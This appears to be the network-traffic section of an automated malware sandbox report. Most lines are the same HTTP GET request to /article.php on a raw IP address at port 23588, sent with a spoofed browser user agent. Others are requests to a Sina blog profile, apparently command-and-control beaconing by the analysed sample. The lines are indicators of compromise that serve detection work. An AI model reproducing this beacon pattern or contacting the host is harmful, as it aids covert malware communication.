Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
